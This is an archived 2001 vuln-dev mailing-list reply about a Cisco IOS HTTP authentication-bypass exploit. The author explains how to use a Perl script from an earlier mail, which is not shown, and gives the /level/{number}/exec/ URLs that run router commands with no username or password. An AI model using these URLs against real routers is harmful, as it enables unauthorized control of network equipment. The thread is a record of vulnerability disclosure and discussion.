Re[2]: Cisco IOS HTTP Configuration Exploit

From: Ertan Kurt (ertankat_private)
Date: Mon Jul 02 2001 - 02:37:26 PDT

Next message: M.Grootveld: "Re: implementation problem in Microsoft LDAP?"

Previous message: Brian Tan: "Re: Cisco IOS HTTP Configuration Exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

BT> Does it mean that when i enter the URL i will not be prompted to enter the username and password??

Yes, just use the perl script (check previous mail) on a http server enabled cisco
router and if it says smtg like:
Vulnerable with {number}
just use that number as shown below:
http://routerIP/level/{number}/exec/-
or send commands directly:
http:///routerIP/level/{number}/exec/-/sh/ip/interface/brief/CR

it will not ask you to provide a username and pass.

Regards,

Ertan Kurt

BT> -----Original Message-----
BT> From:    Ertan Kurt ertankat_private
BT> Sent:    Sun, 1 Jul 2001 12:52:00 +0300
BT> To:      vuln-devat_private
BT> CC:      tamerat_private
BT> Subject: Fwd: Cisco IOS HTTP Configuration Exploit


BT> Hi,

BT> This does not work! What does this tool do really??
BT> I tried on several vulnerable routers but your tool gave errors
***cut***

Next message: M.Grootveld: "Re: implementation problem in Microsoft LDAP?"
Previous message: Brian Tan: "Re: Cisco IOS HTTP Configuration Exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 02 2001 - 13:58:55 PDT